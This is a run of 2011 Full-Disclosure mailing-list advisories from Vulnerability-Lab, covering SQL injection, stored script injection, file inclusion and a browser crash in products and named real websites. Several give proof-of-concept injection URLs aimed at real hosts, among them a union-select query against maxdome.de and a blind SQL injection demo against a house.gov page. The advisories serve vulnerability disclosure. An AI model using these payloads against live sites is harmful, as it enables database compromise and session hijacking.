ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] iGuard Biometric Access Control - Multiple Vulnerabilities
Title: == iGuard Biometric Access Control - Multiple Vulnerabilities Date: = 2011-11-08 References: === 2011/Q3-4 URL: http://vulnerability-lab.com/get_content.php?id=104 VL-ID: = 104 Introduction: = Each iGuard Biometric / Smart Card Security Appliance has a built-in Web Server enables all the computers in the corporate network to directly simultaneously access the device using any Internet Browser, such as Microsoft Internet Explorer Netscape Navigator. Different computer platforms such as Apple Macintosh, Microsoft Windows Linux machines can access the device. No additional software is required. So whether you are in an airport lounge or a hotel room, you can always check if your employees are already in the office or not, and you can even control, modify or disable their access rights to your office remotely via internet connection provided your iGuard Biometric / Smart Card Security Appliance is connected to an external IP address or your network is available through a VPN connection that is reachable from your location. (Copy of the Vendor Website: http://iguard.me/iguard-access-control.html) Abstract: = Vulnerability-Lab Team discovered multiple persistent non-persistent input validation vulnerabilities on iGuards - Biometric Access Control Application. Report-Timeline: 2011-09-01: Public or Non-Public Disclosure Status: Published Affected Products: == Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistent input validation vulnerabilities are detected oniGuards - Biometric Access Control Application. The vulnerability allows an local privileged user account or remote attacker(with inter action) to manipulate the vulnerable application sections. Successful exploitation of the bug can lead to session hijacking manipulation of vulnerable application modules via persistent inject. Vulnerable Module(s): (Persistent) [+] Select Month [+] New Access Record - ID [+] Department ID Description 1.2 A client-side cross site vulnerability is detected on iGuards - Biometric Access Control Application. The bug allows an remote attacker to attack (high user inter action) a customer on client-side. Successful exploitation can result in phishing passwords or manipulation of content when processing client-side requests. Vulnerable Module(s): (Non-Persistent) [+] Employee Record Pictures: ../1.png ../2.png ../3.png ../4.png Proof of Concept: = The vulnerabilities can be exploited by remote attackers or local low privileged user accounts. For demonstration or reproduce ... PoC: (Persistent) ../database.cgi.htm Risk: = The security risk of the persistent web vulnerabilities are estimated as medium. The security risk of the client-side vulnerability are estimated as low. Credits: Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright ©
[Full-disclosure] Joomla Component (com_content) - Blind SQL Injection Vulnerability
Title: == Joomla Component (com_content) - Blind SQL Injection Vulnerability Date: = 2011-11-11 References: === http://www.vulnerability-lab.com/get_content.php?id=323 VL-ID: = 323 Introduction: = Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets and a model–view–controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns[citation needed], stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization. Joomla had been downloaded 23 million times. Between March 2007 and February 2011 there had been more than 21 million downloads. There are over 7,400 free and commercial extensions available from the official Joomla! Extension Directory and more available from other sources (Copy of the Vendor Website: http://en.wikipedia.org/wiki/Joomla!) Abstract: = A vulnerability laboratory researcher discovered a Blind SQL Injection vulnerability on the com_content component of the joomla CMS. Status: Published Exploitation-Technique: === Remote Severity: = Critical Details: A blind SQL Injection vulnerability was detected on the com_content component of the joomla CMS. The vulnerability allows an attacker (remote) to inject/execute own sql statements on the affected application dbms. Successful exploitation of the vulnerability can result in compromise of the affected application dbms. Vulnerable Module(s): [+] com_content Proof of Concept: = The vulnerability can be exploited be remote attackers. For demonstration or reproduce ... 1: [Site]/joomla/index.php?option=com_contentview=archiveyear=1 [BSQLI] 2: [Site]/joomla/index.php?option=com_contentview=archiveyear=-1 or 1=1-- 3: [Site]/joomla/index.php?option=com_contentview=archiveyear=-1 or 1=0-- [x] Demo : http://www.paul.house.gov/index.php?option=com_contentview=archiveyear=-1 or 1=0-- Risk: = The security risk of the blind sql injection vulnerability is estimated as critical. Credits: E.Shahmohamadi (IRAN) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] WhiteHouse Gov Service - Persistent Web Vulnerability
Title: == WhiteHouse Gov Service - Persistent Web Vulnerability Date: = 2011-11-04 References: === http://www.vulnerability-lab.com/get_content.php?id=308 VL-ID: = 308 Introduction: = http://www.whitehouse.gov/ Abstract: = The vulnerability-lab researcher (F0x23 Rem0ve) discovered a persistent script code injection vulnerability on the WhiteHouse Gov website. Report-Timeline: 2011-11-01: Vendor Notification 2011-11-03: Vendor Response/Feedback 2011-11-04: Vendor Fix/Patch 2011-11-04: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: A persistent script code injection vulnerability is detected on the WhiteHouse Gov website. The vulnerability allows remote attackers to implement/inject own malicious script code (persistent) on a web service main module of the website. The successful exploitation of the vulnerability results in hijacking of user-,admin- or -backend sessions, manipulation of profile content, redirect to external malicious targets(websites), defacement can lead to malware infiltration via petition. Vulnerable Module(s): [+] Profil - Location Input Affected Module(s): [+] Petition - Add, Share Sign Picture(s): ../1.png Proof of Concept: = The vulnerabilities can be exploited by remote attackers. For demonstration or reproduce ... PoC: div class=entry entry-creator div class=titlecreator/div div class=nameBernd N/div!--/name-- div class=details 'INJECT/EXECUTE PERSISTENT SCRIPT CODE HERE!!br October 31, 2011br Signature # 1/div /div /div Reference: https://wwws.whitehouse.gov/petitions/!/petition/hey/VLsNrtR1 INPUT FORM: spanCity: /span/label input maxlength=255 name=profile_city id=edit-profile-city size=60 value=VA class=form-text type=text /div input name=form_id id=edit-user-profile-form value=user_profile_form type=hidden div class=form-item clearfix id=edit-profile-state-wrapper label for=edit-profile-statespanState: /span Reference: https://wwws.whitehouse.gov/user/5034619/edit/Personal%20Information PoC: ../PoC.txt ../PoC-Full.txt ../PoC-Input.txt ../Reference.txt Risk: = The security risk of the persistent script code inject is estimated as high(+). Credits: Vulnerability Research Laboratory - Alexander Fuchs (F0x23) Benjamin Kunz Mejri (Rem0ve) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] NATO Research Technology ORG - File Include Vulnerability
Title: == NATO Research Technology ORG - File Include Vulnerability Date: = 2011-11-02 References: === http://www.vulnerability-lab.com/get_content.php?id=307 VL-ID: = 307 Introduction: = The NATO Research and Technology Organisation (RTO) (Organisation pour la Recherche et la Technologie OTAN in French) promotes and conducts co-operative scientific research and exchange of technical information amongst 26 NATO nations and 38 NATO partners. The largest such collaborative body in the world, the RTO encompasses over 3000 scientists and engineers addressing the complete scope of defence technologies and operational domains. This effort is supported by an executive agency, the Research and Technology Agency (RTA), that facilitates the collaboration by organising a wide range of studies, workshops, symposia, and other forums in which researchers can meet and exchange knowledge. (Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/NATO_Research_and_Technology_Organisation ) Abstract: = An anonymous Vulnerability Laboratory researcher discovered a file include vulnerability on the official Nato Research Technologie Organisation service. Report-Timeline: 2011-11-01: Vendor Notification 2011-11-01: Vendor Response/Feedback 2011-11-02: Vendor Fix/Patch 2011-11-02: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Critical Details: A File Include Vulnerability is detected on the NATO Reseacht Technologie Organisation service. An unsecure application parameter request allows remote attackers to include local files. Successful exploitation of the file inclusion may result in dbms compromise, defacement, steal of webmail and login portal accounts or manipulation of service/application content. Vulnerable Module(s): [+] MAIN ASP Vulnerable Para(s): [+] ?topic= Picture(s): ../fi_1.png Proof of Concept: = The vulnerability can be exploited by remote attackers. For demonstration or reproduce ... PoC: http://www.rto.nato.int/Main.asp?topic=images/2008/webbanner.jpg Reference: http://[SERVER].int/[FILE].[ASP]?[PARA]=[INCLUDE LOCAL FILE OR PATH] Solution: = To fix the security issue restrict the request to allowed files parse the input. Form a secure exception-handling filter to prevent against future web attacks. Risk: = The security risk of the file include vulnerability is estimated as critical. Credits: Vulnerability Research Laboratory - Alexander Fuchs (f0x23)Benjamin Kunz Mejri (Rem0ve) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Prosieben Community Website - Persistent Script Code Inject
Title: == Prosieben Community Website - Persistent Script Code Inject Date: = 2011-10-31 References: === http://www.vulnerability-lab.com/get_content.php?id=306 VL-ID: = 306 Abstract: = The Vulnerability Lab Research Team discovered a persistent script code injection vulnerability on prosiebens community website. Report-Timeline: 2011-10-23: Vendor Notification 2011-10-24: Vendor Response/Feedback 2011-10-27: Vendor Fix/Patch 2011-11-01: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: A persistent script code injection vulnerability is detected on Prosiebens Community vendor website. Remote attackers can inject/execute malicious script codes on application side to compromise the community profile of users. Successful exploitation can result in session hijacking profile manipulation via script code injection. Vulnerable Module(s): [+] Profile Content Output - Prosieben Community Proof of Concept: = The vulnerability can be exploited by remote attacker with user account for the community portal. For demonstration or reproduce ... li id=ka_profComment_3464320 class=ka_profComment clearfix style=height: 0pt;div class=ka_profileCommentDate vor 3 Wochen span class=ka_pipe|/span a onclick='var x=.tl(;s_objectID=http://meinecommunity.prosieben.de/service /displayKickPlace.kickAction?u=34728024as=122896_1;return this.s_oc?this.s_oc(e): true' href=/service/displayKickPlace.kickAction?u=34728024as=122896Trololol/a /divdiv class=ka_profileCommentImg a onclick='var x=.tl(;s_objectID=http://meinecommunity.prosieben.de/service/displayKickPlace.kickAction?u=34728024 as=122896_2;return this.s_oc?this.s_oc(e):true' href=/service/displayKickPlace.kickAction?u=34728024as=122896 span style=background-image: url(http://media.kickstatic.com/kickapps/images/122896/icons/defaultMember_122896_portrait 48X48.jpg);/span/a/divdiv class=ka_profileCommentContent clearfixp[PERSISTENT SCRIPT CODE EXECUTION HERE!] /p/divdiv class=ka_profileCommentControls clearfixspan class=ka_flag ka_flag_commenta class= onclick='var x= .tl(;s_objectID=http://meinecommunity.prosieben.de/service/displayKickPlace.kickAction?u=34728024as=122896#_4;return this.s_oc?this.s_oc(e):true' href=#Beitrag melden/a/span/div/li Risk: = The security risk of the persistent script code inject is estimated as high(-). Credits: Vulnerability Research Laboratory - Alexander Fuchs (F0x23) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Opera Browser v11.52 - Stack Buffer Overflow Vulnerability (DoS) Full
Title: == Opera Browser v11.52 - Stack Buffer Overflow Vulnerability Date: = 2011-10-28 References: === http://www.vulnerability-lab.com/get_content.php?id=275 http://packetstormsecurity.org/files/106020/opera1152-overflow.txt VL-ID: = 299 Introduction: = Opera is a web browser and Internet suite developed by Opera Software with over 200 million users worldwide. The browser handles common Internet-related tasks such as displaying web sites, sending and receiving e-mail messages, managing contacts, chatting on IRC, downloading files via BitTorrent, and reading web feeds. Opera is offered free of charge for personal computers and mobile phones. Opera does not come packaged with any desktop operating system. However, it is the most popular desktop browser in some countries, such as Ukraine. Opera Mini, which is the most popula mobile web browser as of May 2011, has been chosen as the default integrated web browser in several mobile handsets by their respective manufacturers. Features include tabbed browsing, page zooming, mouse gestures, and an integrated download manager. Its security features include built-in phishing and malware protection, SSL/TLS encryption when browsing HTTPS websites, and the ability to easily[citation needed] delete private data such as HTTP cookies. Opera is known for originating many features later adopted by other web browsers. Opera runs on a variety of personal computer operating systems, including Microsoft Windows, Mac OS X, Linux, and FreeBSD. Editions of Opera are available for devices using the Maemo, BlackBerry, Symbian, Windows Mobile, Android, and iOS operating systems, as well as Java ME-enabled devices. Approximately 120 million mobile phones have been shipped with Opera. Opera is the only commercial web browser available for the Nintendo DS and Wii gaming systems. Some television set-top boxes use Opera. Adobe Systems has licensed Opera technology for use in the Adobe Creative Suite. (Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Opera_%28web_browser%29) Abstract: = The Vulnerability Laboratory Team discovered a Stack Buffer Overflow Vulnerability (denial of service effect) on Operas new browser v11.52 Report-Timeline: 2011-10-28: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: A stack buffer overflow Vulnerability is detected on Operas v11.52 web browser. The bug is located on operas browser when processing to switch between 2 different escape sequences. The vulnerability can result in a remote denial of service application crash. Overwrite of EIP co. is not possible! Vulnerable Module(s): [+] Escape sequence switch --- Debug Logs --- Executable search path is: ModLoad: 0124 01329000 C:\\Program Files (x86)\\Opera\\opera.exe ModLoad: 7743 775b C:\\Windows\\SysWOW64\\ntdll.dll ModLoad: 76a3 76b4 C:\\Windows\\syswow64\\kernel32.dll ModLoad: 765b 765f6000 C:\\Windows\\syswow64\\KERNELBASE.dll ModLoad: 74db 74eb C:\\Windows\\syswow64\\USER32.dll ModLoad: 7555 755e C:\\Windows\\syswow64\\GDI32.dll ... ... ... ... ModLoad: 7504 75075000 C:\\Windows\\syswow64\\WS2_32.dll ModLoad: 74da 74da6000 C:\\Windows\\syswow64\\NSI.dll ModLoad: 7513 751ab000 C:\\Windows\\syswow64\\COMDLG32.dll ModLoad: 7660 7662d000 C:\\Windows\\system32\\Wintrust.dll ModLoad: 767d 768ed000 C:\\Windows\\syswow64\\CRYPT32.dll ModLoad: 7740 7740c000 C:\\Windows\\syswow64\\MSASN1.dll ModLoad: 7495 74963000 C:\\Windows\\system32\\dwmapi.dll ModLoad: 744f 744fb000 C:\\Windows\\system32\\profapi.dll ModLoad: 6fac 6fac9000 C:\\Windows\\system32\\LINKINFO.dll ModLoad: 716e 716e5000 C:\\Windows\\system32\\Msimg32.dll ModLoad: 7453 7456c000 C:\\Windows\\system32\\mswsock.dll ModLoad: 7452 74525000 C:\\Windows\\System32\\wshtcpip.dll ModLoad: 73a9 73aa C:\\Windows\\system32\\NLAapi.dll ModLoad: 73a8 73a9 C:\\Windows\\system32\\napinsp.dll ModLoad: 73a5 73a62000 C:\\Windows\\system32\\pnrpnsp.dll ModLoad: 73a0 73a44000 C:\\Windows\\system32\\DNSAPI.dll ModLoad: 739f 739f8000 C:\\Windows\\System32\\winrnr.dll ModLoad: 6fbf 6fbf6000 C:\\Windows\\System32\\wship6.dll ... ... ... ... ModLoad: 6f28 6f2ae000 C:\\Windows\\system32\\mlang.dll ModLoad: 7350 73508000 C:\\Windows\\system32\\Secur32.dll ModLoad: 6f1a 6f1a8000 C:\\Windows\\system32\\credssp.dll ModLoad: 6eaf 6eb2a000 C:\\Windows\\SysWOW64\\schannel.dll ModLoad: 6fba 6fbec000 C:\\Windows\\system32\\apphelp.dll ModLoad: 6fa4 6fab C:\\Windows\\system32\\ntshrui.dll ModLoad: 7401 74029000 C:\\Windows\\system32\\srvcli.dll ModLoad: 71b2
[Full-disclosure] eFront Enterprise v3.6.10 - Multiple Remote Vulnerabilities
Title: == eFront Enterprise v3.6.10 - Multiple Remote Vulnerabilities Date: = 2011-10-27 References: === http://www.vulnerability-lab.com/get_content.php?id=298 VL-ID: = 298 Introduction: = Tailored with larger organizations in mind, eFront Enterprise offers solutions for the management of companies most valued asset - the people. Based on a coherent approach to human capital management which keeps the workforce actively engaged, the eFront Enterprise platform offers the means of aligning learning programs with business goals to cultivate employee skills and knowledge associated with business performance. eFront Enterprise builds on top of eFront Educational. (Copy of the Vendor Homepage: http://efrontlearning.net/product/efront-enterprise.html) Abstract: = An anonymous Researcher of the Vulnerability Laboratory Team discovered multiple remote vulnerabilties on the eFronts Enterprise CMS v3.6.10 Report-Timeline: 2011-10-20: Vendor Notification 2011-10-21: Vendor Response/Feedback 2011-10-26: Vendor Fix/Patch 2011-10-27: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Critical Details: 1.1 An anonymous Researcher of the Vulnerability Laboratory Team discovered a multiple sql injection vulnerabilities on eFronts Enterprise CMS v3.6.10. The vulnerability allows an remote attacker or local privileged user account(low:trainee) to inject own sql commands/statements over a vulnerable param. Successful exploitation of the sql injection vulnerability can result in dbms cms compromise. Vulnerable Module(s): [+] survey Vulnerable File(s): [+] professor.php Vulnerable Param(s): [+] ?ctg=surveysurveys_ID= [+] ?ctg=surveyscreen_survey= 1.2 An anonymous Researcher of the Vulnerability Lab Team discovered a database disclosure vulnerability on eFronts Enterprise CMS v3.6.10. Successful exploitation can result in a database steal after upgrade or installation of the CMS. Vulnerable Module(s): [+] Install Vulnerable File(s): [+] install.php Vulnerable Param(s): [+] ?step=2upgrade=1 Proof of Concept: = The vulnerabilities can be exploited by remote attackers local low privileged user accounts. For demonstration or reproduce ... 1.1 - SQL Injection Vulnerabilities PoC: http://xxx.com/enterprise/www/professor.php?ctg=surveyaction=previewsurveys_ID=1+and%201=0-- http://xxx.com/enterprise/www/professor.php?ctg=surveyaction=previewsurveys_ID=1+and%201=1-- 1.2 - Database Disclosure Vulnerability PoC: http://www.xxx.com/e-learning/www/install2/install.php?step=2upgrade=1 View Source Solution: = 2011-10-26: Vendor Fix/Patch = http://forum.efrontlearning.net/viewtopic.php?f=15t=3501 Risk: = The security risk of the vulnerabilities are estimated as high(+). Credits: Vulnerability Research Laboratory - Mohammed Abdelkader A. Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Maxdome Website - SQL Injection Vulnerability
Title: == Maxdome Website - SQL Injection Vulnerability Date: = 2011-10-26 References: === http://www.vulnerability-lab.com/get_content.php?id=300 VL-ID: = 300 Introduction: = maxdome ist das Video-on-Demand-Angebot der ProSiebenSat.1 Media. Das Pay-per-View-Angebot ist das größte und am meisten genutzte im europäischen Raum. Erhältlich sind aktuelle Filme und Serien, oftmals sogar vor der eigentlichen TV-Ausstrahlung im Free- oder Pay-TV sowie eine Vielzahl an Comedy-Inhalten, Dokumentationen, Sport- und Musikvideos. (Copy of the Vendor Homepage: http://www.maxdome.com) Abstract: = Vulnerability-Lab researcher discovered a remote SQL Injection vulnerability on the famous Maxdome`s Portal (videothek) website. Report-Timeline: 2010-12-14: Vendor Notification 2011-05-07: Vendor Response/Feedback 2011-09-03: Vendor Fix/Patch - CHECK BY US! 2011-10-26: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Critical Details: A remote SQL Injection vulnerability is detected on MaxDomes Videothek Portal website. The vulnerability allows an remote attacker to inject own sql commands over the weak id param request. Vulnerable Module(s): [+] Home Flash Video Componente Picture(s): ../sql1.png Proof of Concept: = The sql injection vulnerability can be exploited by remote attackers. For demonstration or reproduce ... Path: /php-bin/functions/home_flash/ File: homeflash.swf Para: ?id= htmlheadbody titleMaxDome - Remote SQL Injection PoC/title brbr bVersion/b iframe src=http://www.maxdome.de/php-bin/functions/home_flash/homeflash.swf?id=- 1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,@@version,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45--+ width=800 height=800 brbr /body/head/html Reference(s): http://www.maxdome.de/php-bin/functions/home_flash/homeflash.swf?id=- 1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,@@version,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45--+ Risk: = The security risk of the sql injection vulnerability is estimated as critical. Credits: Vulnerability Research Laboratory - N/A Anonymous Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] HackInTheBox Quartal Magazine - eZine Issue #007
;) Title: == HITB Quartal Magazine - eZine Issue 007 Date: = 2011-10-18 References: === Original: http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-007.pdf Article: http://magazine.hitb.org/ Mirror: http://www.vulnerability-lab.com/resources/documents/297.pdf Article: http://www.vulnerability-lab.com/get_content.php?id=297 VL-ID: = 297 Status: Published Exploitation-Technique: === Magazin Severity: = Critical Details: Hello readers and welcome to issue #7. It has been a long journey since the first release of the magazine and we have seen a lot of changes and improvements overtime and still trying our best to do more. But as we grow, the amount of work and the time we need to spend working on the magazine have also increased, thus requiring us to recruit more people to join our small editorial team. So, if you think you would like to do something for the community and believe that we can have a great use of your talent - Feel free to drop us an email! As for issue #7, Jonathan Kent wrote a great piece of article about the current global crisis in the cyberspace while Aditya K. Sood and his team on the other hand wrote about extending SQL injection attacks through buffer overflow exploitation. We are also very happy to have Jonathan Brossard contributing an article introducing the readers to his newly released exploitation framework. We will leave you to explore the rest of the articles and we hope you enjoy them. Have fun reading this issue and more to come in issue #8!! Zarul Shahrin Suhaimi Editor-in-Chief, Hack in The Box Magazine Credits: HackintheBox Team (HITB) - magazine.hitb.org Disclaimer: === The information provided in this document is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Skype Software Vulnerabilities - 0 Day Exploitation 2011
Title: == Skype Software Vulnerabilities - 0 Day Exploitation 2011 [HACK IN THE BOX MALAYSIA #2011 KUL CONFERENCE] (13th) Date: = 2011-10-16 References: === Article: http://www.vulnerability-lab.com/get_content.php?id=293 Document: http://www.vulnerability-lab.com/resources/documents/293.pdf Speaker: http://conference.hitb.org/hitbsecconf2011kul/?page_id=1757 Conference Mirror: http://conference.hitb.org/hitbsecconf2011kul/materials/D2T1 - SKYPE SOFTWARE VULNERABILITIES - ZERO DAY EXPLOITATION 2011.zip VL-ID: = 293 Status: Published Exploitation-Technique: === Report Severity: = Critical Details: SKYPE VOICE OVER IP - SOFTWARE VULNERABILITIES TECHNIQUES METHODS – ZERO DAY EXPLOITATION 2011 1. (Overview) Authors of the Skype Exploitation White-Paper - 1.1 Pim J.F. Campers - 1.2 Benjamin Kunz Mejri 2. (Preface) Information around the White-Paper Skype - 2.1 Infomercial 3. (Overview) Published Skype Vulnerabilities 2004-2010 - 3.1 URI Handler Skype Vulnerabilities - 3.2 Denial of Service Skype Vulnerabilities - 3.3 Creation Deletion Skype Vulnerabilities - 3.4 Buffer Overflow Skype Vulnerabilities 4. (How 2 Exploit Detect?) - 4.1 How to detect own Skype 0-day vulnerabilities? - 4.2 How to exploit skype 0-day vulnerabilities out of the box? - 4.2.1 Client Side Exploitation Map (Remote) - 4.2.2 Server-Side 1 Exploitation Map (Remote Local) - 4.2.3 Server-Side 2 Exploitation Map (Remote Local) - 4.2.4 Pointer Exploitation Map (Local) - 4.2.5 Exchange Buffer Overflow Map (Remote Local) - 4.2.7 Denial of Service Map (Local to Remote) 5.(Main Presentation) Presentation of own 0 day Skype Vulnerabilities - 5.6 Skype v5.3.x v2.2.x v5.2.x – Denial of Service Vulnerability - 5.2 Skype 5.3.x 2.2.x 5.2.x - Persistent Software Vulnerability - 5.1 Skype 5.3.x 2.2.x 5.2.x - Persistent Profile XSS Vulnerability - 5.5 Skype v5.2.x and v5.3.x – Memory Corruption Vulnerability - 5.3 Skype v5.3.x - Transfer Standby Buffer Overflow Vulnerability 6. Skype Security Time-Lines - 6.1 Response, Fix/Patch Time-Line 7. (Review) Security Session Videos - 6.1 Skype (VoIP) - Denial of Service Vulnerability.wmv [HD] - 6.2 Skype (VoIP) - Persistent Profile XSS Vulnerability [HD] - 6.3 Skype (VoIP) - [Pointer Bug] Memory Corruption [HD] 8. Credits Infomercial - 8.1 Vulnerability Laboratory Credits: Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve) Pim J.F. Campers (X4lt) Disclaimer: === The information provided in this document is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states 